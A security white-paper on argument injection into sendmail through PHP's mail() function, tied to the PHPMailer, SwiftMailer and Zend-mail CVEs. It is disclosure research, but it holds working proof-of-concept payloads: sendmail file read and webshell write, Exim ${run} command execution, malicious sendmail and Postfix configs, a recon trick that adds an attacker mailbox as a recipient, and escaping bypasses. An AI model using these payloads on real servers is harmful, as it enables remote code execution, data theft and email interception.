|=-----------------------------------------------------------------------=| |=-------------=[ Pwning PHP mail() function For Fun And RCE ]=---------=| |=---------------=[ New Exploitation Techniques And Vectors ]=-----------=| |=----------------------------=[ Release 1.0 ]=--------------------------=| |=-----------------------------------------------------------------------=| |=-----------------------------------------------------------------------=| |=-------------------=[ by https://legalhackers.com/ ]=-------------------=| |=-----------------------------------------------------------------------=| |=---------------------=[ https://ExploitBox.io ]=-------------------=| |=---------------------=[ @Exploit_Box ]=-------------------=| |=-----------------------------------------------------------------------=| --[ Table of contents 0 - Introduction 1 - SMTP protocol - RFC 2821 2 - The mail() function 2.1 - The 5th parameter ($additional_parameters) 2.2 - The /usr/sbin/sendmail interface invoked by the mail() function 3 - Sendmail Command Injection via mail() and $additional_parameters 3.1 - escapeshellcmd() escaping 3.2 - Sendmail Command Parameter Injection 4 - Differences in the implementation of /usr/sbin/sendmail 5 - Known exploitation vectors 5.1 - Sendmail MTA: Arbitrary File Read with -C argument 5.2 - Sendmail MTA: Arbitrary File Write / Remote Code Execution 6 - New exploitation vectors/techniques discovered by the author 6.1 - All MTAs: Snatching emails / Performing Recon 6.2 - Sendmail MTA: Improvements to the existing File Write vector 6.3 - SendmailMTA: Remote Code Execution via sendmail.cf config 6.4 - Exim MTA: Remote Code Execution 6.5 - Postfix MTA: Code Execution via malicious config 6.6 - Sendmail MTA: Denial of Service via File Read + File Append 7 - The param injection point & Real World vulnerability examples 7.1 - Vulnerable email libraries (PHPMailer / Zend-mail / SwiftMailer) 7.2 - The sender injection via SetFrom() method of the PHP email libs 7.3 - Other injection points / ways to exploit mail() vulnerabilities 8 - Bypass techniques 8.1 - The beauty of RFC 3696 & RFC 822 8.2 - Bypassing escapeshellarg() applied on mail() 9 - Credits 10 - References 11 - Disclaimer --[ 0 - Introduction This white-paper strives to clear the common misonception in regards to the limitations in exploitation of the PHP mail() function and show that the exploitation can be taken further than what is currently believed. It presents several new exploitation vectors and bypass techniques on the PHP mail() function that were discovered and recently released by the author of this white-paper in the course of finding multiple critical vulnerabilities in major PHP e-mail sending libraries (PHPMailer, Zend Framework / Zend-mail, SwiftMailer) that are used by millions of web applications/projects (e.g Wordpress, Drupal, Joomla etc.) and PHP programming frameworks (Zend, Yii2, Symphony, Laravel etc.) The techniques include Exim vector that was believed to not be exploitable via mail() function. This vector takes the mail() injection attacks to a new level. A successful exploitation of the mail() function, could allow attackers to achieve Remote Code Execution and other malicious goals. --[ 1 - SMTP protocol - RFC 2821 According to the RFC 2821 https://www.ietf.org/rfc/rfc2821.txt A client email program would typically send a set of SMTP commands similar to the following when connecting to an SMTP server: HELO server-port25.com MAIL FROM: <support@server-port25.com> RCPT TO: <jdoe@dest-server.com> DATA From: "John Smith" <jsmith@server-port25.com> Reply-To: "Another Johns email" <John2@another-server25.com> To: "Jane Doe" <jdoe@dest-server.com> Subject: test message Date: Wed, 4 Jan 2017 06:19:57 -0400 Hello World, This is a test message sent by SMTP Regards . The important part from the perspective of understanding PHP mail() function / sendmail's email address usage described further on is that SMTP client specifies email addresses related to the sender addresses in 2 places: MAIL FROM: <support@server-port25.com> and in the header set: From: "John Smith" <jsmith@server-port25.com> Reply-To: "Another Johns email" <John2@another-server25.com> that is sent after the DATA command. The first will be used by the destination SMTP server to return an email in case of a delivery problem. The latter will be used entirely by the email client software (such as Outlook, Thunderbird etc.) of the user who receives the email, to display the sender information (based on the From header) in a 'From' address field as well as to decide (based on Reply-To header if present, or From header if missing) which address to reply to when the user clicks the Reply button. --[ 2 - The mail() function mail() is a standard PHP function that is used as an interface for sending e-mails from PHP scripts. http://php.net/manual/en/function.mail.php The function has the following definition: # php --rf mail Function [ <internal:standard> function mail ] { - Parameters [5] { Parameter #0 [ <required> $to ] Parameter #1 [ <required> $subject ] Parameter #2 [ <required> $message ] Parameter #3 [ <optional> $additional_headers ] Parameter #4 [ <optional> $additional_parameters ] } } From an attacker's perspective, the last (5th) argument is the most interesting as it can allow injection of additional parameters to /usr/bin/sendmail program installed on the system which is transparently used by mail() to deliver the actual message. --[ 2.1 - The 5th parameter ($additional_parameters) The 5th parameter is optional. Many web applications use it however to set envelope sender address / return-path with the parameter: -f email@server-address.com or alternatively: -r email@server-address.com The parameter with the address will be passed to /usr/sbin/sendmail, which will use the email address to inform the receiving email server about the origin/sender (through the 'MAIL FROM' SMTP command), for it to know where to return an error message in case of a delivery failure. --[ 2.2 - The /usr/sbin/sendmail interface invoked by the mail() function /usr/sbin/sendmail program, as the name suggests, is an interface that can be used for sending emails. It is provided by the mail transfer agent (MTA) software installed on the system (such as Sendmail, Postfix etc.). When an email is sent with mail() by this simple PHP script: <?php $to = "john@localhost"; $subject = "Simple Email"; $headers = "From: mike@localhost"; $body = 'Body of the message'; $sender = "admin@localhost"; mail($to, $subject, $body, $headers, "-f $sender"); ?> PHP will make the following execve() call to execute sendmail program: execve("/bin/sh", ["sh", "-c", "/usr/sbin/sendmail -t -i -f admin@localhost"], [/* 24 environment vars */]) and pass the following data to its STDIN: To: john@localhost Subject: Simple Email X-PHP-Originating-Script: 0:simple-send.php From: mike@localhost Body of the message The -t and -i parameters are added by PHP automatically. Parameter -t makes sendmail extract headers from STDIN , and -i prevents sendmail from treating '.' as the end of input. The -f comes from the 5th parameter of the mail() function call. What is interesting here is that the sendmail command gets executed with the help of the system shell (sh) which creates some opportunities for command injection attacks if the application passes untrusted input to the last / the 5th parameter of mail() function. --[ 3 - Sendmail Command Injection via mail() and $additional_parameters If an attacker was able to inject data to the 5th parameter of mail() function, for example by means of the $sender variable set to an unfiltered GET variable: $sender = $_GET['senders_email']; mail($to, $subject, $body, $headers, "-f $sender"); The attacker could inject arbitrary extra parameters to the /usr/sbin/sendmail command by making the request to the PHP script: http://webserver/vulnerable.php?senders_email=attackers@email%20extra_data which would execute mail() as: mail(..., "-f attackers@email extra_data"); which would lead to executing sendmail with the parameters: /usr/sbin/sendmail t -i -f attackers@email extra_data --[ 3.1 - escapeshellcmd() escaping The important thing to note is that the mail() function performs command escaping internally by essentially calling the : escapeshellcmd($additional_parameters) function, so that shell metacharacters will not work. For example, setting $senders_email GET variable to: attacker@remote > /tmp/shell_injection will not lead to the file creation of the shell_injection file as > character will get escaped by the escapeshellcmd() and the sendmail call will turn into: /usr/sbin/sendmail t -i -f attacker@remote \> /tmp/shell_injection thus preventing the special function of the '>' shell metacharacter. --[ 3.2 - Sendmail Command Parameter Injection The attacker can however inject additional command parametrs to the sendmail command itself as the escapeshellcmd() function called by mail() does not quote the $additional_parameters parameter by default. It gives a programmer freedom to pass multiple arguments to sendmail, but may introduce a vulnerability to unaware programmers. A successful injection of additional parameters to sendmail, might trigger additional functionality of the sendmail program itself. For example, if the attacker managed to set $return variable to: attackere@remote -LogFile /tmp/output_file The sendmail program would be called as a shell command: /usr/sbin/sendmail -t -i -f attackere@remote -LogFile /tmp/output_file If the -LogFile was a valid argument for the sendmail interface installed on the target machine, this could cause the program to write out a log file into /tmp/output_file. As it turns out Sendmail MTA has such a logging function in its implementation of /usr/sbin/sendmail interface, which can be enabled by -X parameter and could be used to save malicious code provided by the attacker. --[ 4 - Differences in the implementation of /usr/sbin/sendmail As mentioned in the previous chapters, sendmail interface is provided by the MTA email software (Sendmail, Postfix, Exim etc.) installed on the system. Although the basic functionality (such as -t -i -f parameters) remains the same for compatibility reasons, other functions and parameters vary greatly depending on the MTA installed. For example, the aforementioned -X parameter that can be used for logging is only implemented in the Sendmail MTA's version of /usr/sbin/sendmail interface. The others, simply implement it as a dummy switch, for compatibility reasons or do not support it at all. For this reason the man page for sendmail program varies depending on the MTA installed on the system. Here are a few examples of different man pages of sendmail command/interface: Sendmail MTA: http://www.sendmail.org/~ca/email/man/sendmail.html Postfix MTA: http://www.postfix.org/mailq.1.html Exim MTA: https://linux.die.net/man/8/exim --[ 5 - Known exploitation vectors The potential malicious usage of the 5th parameter of mail() involving parameter injection to /usr/sbin/sendmail apears to be first uncovered by Sogeti/ESEC company in the blog post released in 2011: http://esec-pentest.sogeti.com/posts/2011/11/03/using-mail-for-remote-code-execution.html The blog post revealed 2 exploitation vectors for Sendmail MTA that may allow an attacker to * read/write to an arbitrary file and potentially gain Remote Code Execution via -C and -X parameters to sendmail interface provided by Sendmail MTA. These 2 vectors only work on Sendmail MTA, and are presented below. --[ 5.1 - Sendmail MTA: Arbitrary File Read with -C argument From sendmail man page: -Cfile Use alternate configuration file. -X logfile Log all traffic in and out of mailers in the indicated log file. These 2 parameters can be combined to cause sendmail to load an arbitrary file as the config, and output the contents as a set of error messages (due to unknown config lines). For example, if attacker injected: -C/etc/passwd -X/tmp/output.txt as the 5th parameter of mail(), the following command would get executed: /usr/sbin/sendmail -i -t -C/etc/passwd -X/tmp/output.txt which would save the following data into /tmp/output.txt: /etc/passwd: line 1: unknown configuration line "root:x:0:0:root:/root:/bin/bash" /etc/passwd: line 2: unknown configuration line "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" /etc/passwd: line 3: unknown configuration line "bin:x:2:2:bin:/bin:/usr/sbin/nologin" /etc/passwd: line 4: unknown configuration line "sys:x:3:3:sys:/dev:/usr/sbin/nologin" /etc/passwd: line 5: unknown configuration line "sync:x:4:65534:sync:/bin:/bin/sync" /etc/passwd: line 6: unknown configuration line "games:x:5:60:games:/usr/games:/usr/sbin/nologin" ... For the attack to be useful to a remote attacker. The output file would need to be placed in a writable directory under the document root where it could be retrieved by the attacker through the web server. --[ 5.2 - Sendmail MTA: Arbitrary File Write / Remote Code Execution The -X parameter can also be used in combination with the: -OQueueDirectory=/tmp/ parameter of Sendmail MTA's version of /usr/sbin/sendmail interface. The parameter is described by the man page as: QueueDirectory=queuedir Select the directory in which to queue messages. Attacker needs to select a world-writable directory to allow for saving temporary files. This will allow to successfully send a message passed to sendmail, as well as save to the log file into an arbitrary file pointed by -X parameter. Simple PoC: <?php $sender = "attacker@anyhost -OQueueDirectory=/tmp/ -X/tmp/poc.php"; $body = '<?php phpinfo(); ?>'; // ^ unfiltered vars, coming from attacker via GET, POST etc. $to = "john@localhost"; $subject = "Simple Email"; $headers = "From: mike@localhost"; mail($to,$subject,$body,$headers, "-f $sender "); ?> The PoC will save the PHP code within $body into the log file with this resulting contents of /tmp/poc.php: 06272 <<< To: john@localhost 06272 <<< Subject: Simple Email 06272 <<< X-PHP-Originating-Script: 0:simplepoc.php 06272 <<< From: mike@localhost 06272 <<< 06272 <<< <?php phpinfo(); ?> 06272 <<< [EOF] As the attacker might be able to control both the filename and contents, this could potentially result in Arbitrary PHP code execution if the attacker managed to save it under a writable directory within the document root such as: -X/var/www/html/webapp1/upload/backdoor.php which they could then execute by a GET request: http://victim-server/webapp1/upload/backdoor.php For this to work, the upload directory must have enabled parsing/execution of PHP files which sometimes gets turned off for security reasons by the administrator or by the webapplication installer (via special rules in .htaccess placed within the upload directory). Also note that the output log file contains a lot of debug information added by Sendmail MTA. --[ 6 - New exploitation vectors/techniques discovered by the author Sendmail MTA is rarely used due to its complexity and a history of vulnerabilities. It is no longer used by modern Linux distributions as the default MTA and have been replaced with Postfix MTA on RedHat-based systems such as CentOS, and with Exim MTA on Debian-based systems such as Ubuntu, Debian etc. This makes it quite difficult to find Sendmail MTA in a real-world setups. On systems where it is available, the exploitation could sometimes be tricky due to the aforementioned limitations (correct webroot paths, requirement for a php-executable/writable directory, mised-up payload). As both of the known vectors presented in previous chapter require Sendmail MTA to work, the author has performed a new research which lead to the discovery of new exploitation vectors/techniques that may be used on systems with modern MTAs such as Exim and Postfix. The research has also produced a new vector for Sendmail MTA as well as some improvements to the already-known vectors. --[ 6.1 - All MTAs: Snatching emails / Performing Recon One of the arguments that does not change across different MTAs is the list of additional recipients which comes after the option list as per this man page: sendmail [option ...] [recipient ...] If attacker control the 5th parameter of mail() they can simply append an extra recipient as shown below: <?php // Recon via mail() vector on all MTAs / sendmail versions // // Created by: // Dawid Golunski - @dawid_golunski - https://legalhackers.com $sender = "nobody@localhost attacker@anyhost-domain.com"; // ^ unfiltered var, coming from attacker via GET, POST etc. $to = "support@localhost"; $headers = "From: mike@localhost"; $subject = "Support ticket: Remote Recon PoC"; $body = "Show me what you got!"; mail($to,$subject,$body,$headers, "-f $sender "); ?> which would execute the command: /usr/sbin/sendmail -t -i -f support@localhost attacker@anyhost-domain.com and send an email similar to the following right into the attacker's mailbox attacker@anyhost-domain.com: Return-Path: <nobody@localhost> Received: from localhost (localhost [127.0.0.1]) by localhost (8.14.4/8.14.4/Debian-8+deb8u1) with ESMTP id v04FSqQ5008197; Wed, 4 Jan 2017 10:28:52 -0500 Received: (from www-data@localhost) by localhost (8.14.4/8.14.4/Submit) id v04FSqEU008196 for attacker@anyhost-domain.com; Wed, 4 Jan 2017 10:28:52 -0500 Date: Wed, 4 Jan 2017 10:28:52 -0500 Message-Id: <201701041528.v04FSqEU008196@localhost> X-Authentication-Warning: localhost: www-data set sender to nobody@localhost using -f To: support@localhost Subject: Support ticket: Remote Recon PoC X-PHP-Originating-Script: 1000:recon-test.php From: mike@localhost This might reveal: * version of operating system in use (Debian) * server IPs * the version of MTA in use (8.14.4 in this case, which is Sendmail MTA) * the name of the script that sent the message (recon-test.php) which could reveal the name of the email sending library/framework in use e.g: X-PHP-Originating-Script: 0:class.phpmailer.php If an application uses a dedicated email library such as PHPMailer, Zend-mail etc. it might also append its version header. For example: X-Mailer: PHPMailer 5.2.17 (https://github.com/PHPMailer/PHPMailer) Knowing the library in use attacker can adjust their attack to the specific OS / MTA and PHP email library in use. For example, the above version of PHPMailer is vulnerable to: PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) discovered by the author. --[ 6.2 - Sendmail MTA: Improvements to the existing File Write vector It is mistakenly believed that -X parameter requires a full path and therefore an attacker needs to guess the webroot of a vulnerable website. This is however not true as sendmail will also accept a relative path. This allows the attacker to simply use the current working directory of the remote vulnerable script as a reference. If the remote script is running at the top level of the webroot, the attacker may try to inject the following argument: -X ./upload/backdoor.php instead of -X /var/www/html/webapp1/guessed-webroot/ Additionally, the somewhat long: -OQueueDirectory=/tmp/ parameter can also be reduced to: -oQ/tmp/ which might be useful if a web application limits the size of the $sender string, as well as to bypass potential filtration of '=' character etc. --[ 6.3 - SendmailMTA: Remote Code Execution via sendmail.cf config In a secure deployment of a webapp, PHP script execution might be disabled within the upload directory and the application might only allow upload of static files such as text files, images etc. A new vector was discovered that could allow RCE despite these limitations. As sendmail interface allows to load a custom Sendmail MTA config file via -C argument to /usr/sbin/sendmail , an attacker could upload a malicious config file as a static/text file via webapp's upload feature and use it to force Sendmail to execute malicious code upon processing an email message. This could be achieved by making a copy of /etc/mail/sendmail.cf config file and replacing the default Mlocal mail handler present at the end of the file with a Sendmail config shown below (between the # lines): <?php /* ########################################################################## # Sendmail MTA config vector executing /usr/bin/php that loads RCE code # on stdin passed by mail() (e.g. within message body / subject etc.) # # Make a copy of a sendmail.cf config from /etc/mail/sendmail.cf # and then append this config stanza/vector to the end of it. # Such stanza can then be uploaded to the target webapp into upload/ dir # for example with an example name of: sendmail_cf_exec # # Created by: # Dawid Golunski - @dawid_golunski - https://legalhackers.com Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, T=DNS/RFC822/X-Unix, A=php -- $u $h ${client_addr} ########################################################################## */ $sender = "attacker@anyhost -oQ/tmp/ -C./upload/sendmail_cf_exec www-data@localhost"; $body = 'PHP RCE code: <?php system("touch /tmp/PWNED"); ?>'; // ^ unfiltered vars, coming from attacker via GET, POST etc. $to = "john@localhost"; $subject = "Exim RCE PoC"; $headers = "From: mike@localhost"; mail($to,$subject,$body,$headers, "-f $sender "); ?> The $sender payload will use relative path to load the crafted Sendmail MTA config file from (previously uploaded with the static file uploader) upload/sendmail_cf_exec and use it to process the incoming email from mail() function. Sendmail MTA will then spawn /usr/bin/php process and process the attacker's payload within the $body of the message. Apart from the remote exploitation with static file upload scenario, this vector could obviously also be very easily used in a shared hosting environment. In such a case, an attacker could easily use /tmp directory to prepare the malicious config and then use mail() vulnerability in the target app to load the config and gain code execution in the context of the victim user. --[ 6.4 - Exim MTA: Remote Code Execution Exim MTA is the default MTA software installed with Debian-based systems such as Ubuntu and Debian. The /usr/sbin/sendmail interface provided by Exim4 has a fairly rich set of functions. The research uncovered -be option which can be very useful to attackers. The man page states: -be Run Exim in expansion testing mode. Exim discards its root privilege, to prevent ordinary users from using this mode to read otherwise inaccessible files. If no arguments are given, Exim runs interactively, prompting for lines of data. Otherwise, it processes each argument in turn. The exim syntax/language provided by Exim was investigated for interesting variables that could be expanded. The exim syntax allows expanding standard variables such as: '$h_subject' or '$recipients'. Further research however uncovered ${run} which can be expanded to return a result of a shell command. For example, the following string: ${run{/bin/true}{yes}{no}} would be expanded to 'yes' upon successful execution of /bin/true. This was quickly turned into Arbitrary Remote Code Execution payload which would execute arbitrary shell command passed within $body of the message: <?php // RCE via mail() vector on Exim4 MTA // Attacker's cmd is passed on STDIN by mail() within $body // Discovered by: // Dawid Golunski - @dawid_golunski - https://legalhackers.com $sender = "attacker@anyhost -be"; $body = 'Exec: ${run{/bin/bash -c "/usr/bin/id >/tmp/id"}{yes}{no}}'; // ^ unfiltered vars, coming from attacker via GET, POST etc. $to = "john@localhost"; $subject = "Exim RCE PoC"; $headers = "From: mike@localhost"; mail($to,$subject,$body,$headers, "-f $sender "); ?> This exploit vector seems the most powerful as it can allow attackers to achieve instant RCE on systems with Exim MTA. The code will get executed as soon as injected parameter/body of mail() function gets passed to /usr/sbin/sendmail. There is no need to write to any files and therefore writable directories that are parsed by PHP engine are not required. --[ 6.5 - Postfix MTA: Code Execution via malicious config Postfix has proved to be more tricky during the research. Nevertheless it was possible to determine a way that an attacker could use to achieve code execution when the attacker and the target reside within the same shared hosting environment. Certain setups could also make it possible to carry out the attack remotely. Similarly to Sendmail MTA, the /usr/sbin/sendmail interface provided by Postfix MTA has a -C switch that can be used to load a custom config. sendmail will fail however as soon as the attacker's message message is passed to postdrop command for proessing. Postdrop will notice the -C config and stop further execution. This could be bypassed however by creating a custom main.cf Postfix config in /tmp/main.cf file with the following setting: mailbox_command = /tmp/postfixfakebin/ The attacker could then place a malicious bash script/binary within the postfix_fake_bin directory and inject the following parameter to the /usr/sbin/sendmail interface provided by Postfix MTA, through mail() parameter injection as shown in the PoC below: <?php /* Code Exec via mail() vector on Postfix MTA Attacker's shell cmds must be placed under postdrop file within a shared directory e.g. /tmp/postfixfakebin/postdrop A config line of: mailbox_command = /tmp/postfixfakebin/ must also be added to a shared directory e.g. /tmp/main.cf Created by: Dawid Golunski - @dawid_golunski - https://legalhackers.com */ $sender = "attacker@anyhost -C /tmp/"; // ^ unfiltered vars, coming from attacker via GET, POST etc. $body = 'Simple body, the payload is in postdrop anyway'; $to = "john@localhost"; $subject = "Postfic exec PoC"; $headers = "From: mike@localhost"; mail($to,$subject,$body,$headers, "-f $sender "); ?> This scenario could potentially be exploited remotely if a target webapp (vulnerable to mail() param injection) provides a file manager utitlity that allows the attacker to create directories/files but does not parse PHP files. Another remote scenario could include a file uploader which lets users upload ZIP files. A malicious zip could contain main.cf and postdrop script/binary which gets extracted into a known location. --[ 6.6 - Sendmail MTA: Denial of Service via File Read + File Append The -C and -X parameters could be used to perform a Denial of Service attack on the target by reading big known files such as web server logs with -C option and appending them to a file in a writable directory by the web server such as /tmp , /var/www/html/upload , /var/lib/php5/sessions etc. to exhaust disk space necessary for the correct operation of the web application / the OS. Although this specific example is limited to Sendmail MTA, this vector likely affects more MTA servers and there likely are other parameters supported by the remaining MTAs that could carry out a similar DoS attack. --[ 7 - The param injection point & Real World vulnerability examples The mail() parameter injection was deemed hardly exploitable / impractical for many years as the 5th parameter of mail() has been thought to be rarely exposed to malicious input outside of web application control panels which are usually restricted to administrative users and therefore are usually of little use to remote attackers. Finding a mail() param injection vulnerability, would also not necessarily guarantee a successful exploitation as it would depend on installed MTA on the web server (its sendmail interface) and up until now the only option was rarely used Sendmail MTA with the 2 vectors -X -C (File Write / Read) which decreased the attack surface further. For this reason, the new attack vectors presented in the previous chapter could be very useful in exploitation of the real world new vulnerabilities described further on and open more attack possibilities. --[ 7.1 - Vulnerable email libraries (PHPMailer / Zend-mail / SwiftMailer) Recently a set of mail() param injection vulnerabilities was exposed by the author: PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074) Zend Framework/zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034) The details can be seen in the respective advisories, however we can have a quick look at the problem they all shared, on the example of PHPMailer. --[ 7.2 - The sender injection via SetFrom() method of the PHP email libs Similarly to the other email libraries, PHPMailer class uses PHP mail() function as its default transport. The transport was implemented using the mailSend() function: protected function mailSend($header, $body) { $toArr = array(); foreach ($this->to as $toaddr) { $toArr[] = $this->addrFormat($toaddr); } $to = implode(', ', $toArr); $params = null; //This sets the SMTP envelope sender which gets turned into a //return-path header by the receiver if (!empty($this->Sender)) { $params = sprintf('-f%s', $this->Sender); } ... $result = false; if ($this->SingleTo and count($toArr) > 1) { foreach ($toArr as $toAddr) { $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params); as can be seen, it creates a $params variable that appends $this->Sender property to '-f ' string to create a sendmail parameter (Envelope Sender / MAIL FROM) that gets passed to the mail() function as the 5th parameter. The internal $this->Sender property can be validated and set by calling the setFrom() method of PHPMailer class. This looks as follows: public function setFrom($address, $name = '', $auto = true) { $address = trim($address); $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim // Don't validate now addresses with IDN. Will be done in send(). if (($pos = strrpos($address, '@')) === false or (!$this->has8bitChars(substr($address, ++$pos)) or !$this->idnSupported()) and !$this->validateAddress($address)) { ... In theory, setFrom() should rarely be exposed to untrusted user input, and even if it was, there is a validation function in place that validates the email to be RFC 822 compliant so this should not be a problem. The PHPMailer tutorial at: https://github.com/PHPMailer/PHPMailer/wiki/Tutorial shows a basic usage PHPMailer as: <?php require 'PHPMailerAutoload.php'; $mail = new PHPMailer; $mail->setFrom('from@example.com', 'Your Name'); $mail->addAddress('myfriend@example.net', 'My Friend'); $mail->Subject = 'First PHPMailer Message'; $mail->Body = 'Hi! first e-mail from PHPMailer.'; if(!$mail->send()) { echo 'Message was not sent.'; echo 'Mailer error: ' . $mail->ErrorInfo; } else { echo 'Message has been sent.'; } Contrary to what the name might suggest, this setFrom() example should not however be used for storing an address provided by visitors. Unfortunatelly, due to the name of the function and the popularity of the code snippet, many scripts use setFrom() to set the visitor's 'From' e-mail address passed through a field in various Contact and Feedback forms. Unaware that they should be using AddReplyTo() (which sets the DATA/Reply-To header, as opposed to the MAIL FROM/Envelope Sender address) instead. Implementation with setFrom() will however achieve the result and the Contact/Feedback form may work as expected, even though it does not conform to the email best practice. This would not make a severe security flaw , if it was not for the fact that the untrusted email address set with setFrom() would end up as the 5th parameter to mail() function and the RFC validation could be bypassed. This made it possible to inject arbitrary parameters to /usr/sbin/sendmail and lead to a critical Remote Code Execution flaw that could be exploited via a range of vectors presented in the previous chapter. As mentioned, the other PHP libraries had a very similar flaw which was later dubbed with a name - "PwnScriptum". More details together with a demo of this vulnerability showing how it could get exploited via a Contact form can be seen at: https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html A limited exploit has also been shared at: https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py --[ 7.3 - Other injection points / ways to exploit mail() vulnerabilities The remaining real-world examples will be described in the next version of this white-paper once the issues have been fixed by certain vendors that are currently working on security patches. --[ 8 - Bypass techniques This chapter presents some bypass techniques that might come in handy to bypass similar protections. The next 2 were used to bypass protections offered by the PHP email libraries discussed in the previous chapter. --[ 8.1 - The beauty of RFC 3696 & RFC 822 The RFC 3696 / RFC 822 standards https://tools.ietf.org/html/rfc3696 https://www.ietf.org/rfc/rfc0822.txt emails to take the following forms: Abc\@def@example.com Fred\ Bloggs@example.com Joe.\\Blow@example.com "Abc@def"@example.com "Fred Bloggs"@example.com The generosity of these standards allowed the author to construct a valid email address that complies with the RFCs but is at the same time a malicious payload for the 5th argument of mail(): "Attacker \" -Param2 -Param3"@test.com when passed to a vulnerable PHP email library and then to mail() function, it would cause sendmail to execute with the parameters: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fAttacker\] Arg no. 4 == [-Param2] Arg no. 5 == [-Param3"@test.com] Attacker could thus break out of the -f parameter context and inject additional parameters (arg no. 4 and arg no. 5 in the example above). --[ 8.2 - Bypassing escapeshellarg() applied on mail() It seems intuitive that additional parameters passed to sendmail via the 5th parameter of mail() function should be single quoted with escapeshellarg() function which has been designed for this kind of purpose. Unfortunatelly, it clashes with the internal command escaping performed internally by the mail() function. A good example of this is the CVE-2016-10033 vulnerability which turned into a new vulnerability of CVE-2016-10045 , as the fix of this kind could be bypassed due to the clashing and setting the Sender to: $mail->SetFrom("\"Attacker\\' -Param2 -Param3\"@test.com", 'Client Name'); would result in the followig list of arguments passed to sendmail program: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-f\"Attacker\\\] Arg no. 4 == [-Param2] Arg no. 5 == [-Param3"@test.com'] which again resulted in arbitrary parameters (arg 4 & 5) passed to /usr/sbin/sendmail. --[ 9 - Credits This security white-paper has been written by: Dawid Golunski (@dawid_golunski) https://legalhackers.com dawid[at]legalhackers.com Please add a link back to this paper if the information proved to be useful to you. --[ 10 - References [0] https://legalhackers.com/ [1] https://www.ietf.org/rfc/rfc2821.txt [2] http://php.net/manual/en/function.mail.php [3] http://www.sendmail.org/~ca/email/man/sendmail.html [4] http://www.postfix.org/mailq.1.html [5] https://linux.die.net/man/8/exim [6] https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html [7] https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py [8] https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html --[ 11 - ExploitBox - A Playground For Hackers Interested in vulns/exploitation? .;lc' .,cdkkOOOko;. .,lxxkkkkOOOO000Ol' .':oxxxxxkkkkOOOO0000KK0x:' .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. '';ldxxxxxdc,. ,oOXXXNNNXd;,. .ddc;,,:c;. ,c: .cxxc:;:ox: .dxxxxo, ., ,kMMM0:. ., .lxxxxx: .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: .dxxxxxdl;. ., .. .;cdxxxxxx: .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. .':oxxxxxxxxx.ckkkkkkkkxl,. .,cdxxxxx.ckkkkkxc. .':odx.ckxl,. .,.'. https://ExploitBox.io https://twitter.com/Exploit_Box Subscribe to stay updated and be there for the launch. --[ 12 - Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. --[ EOF
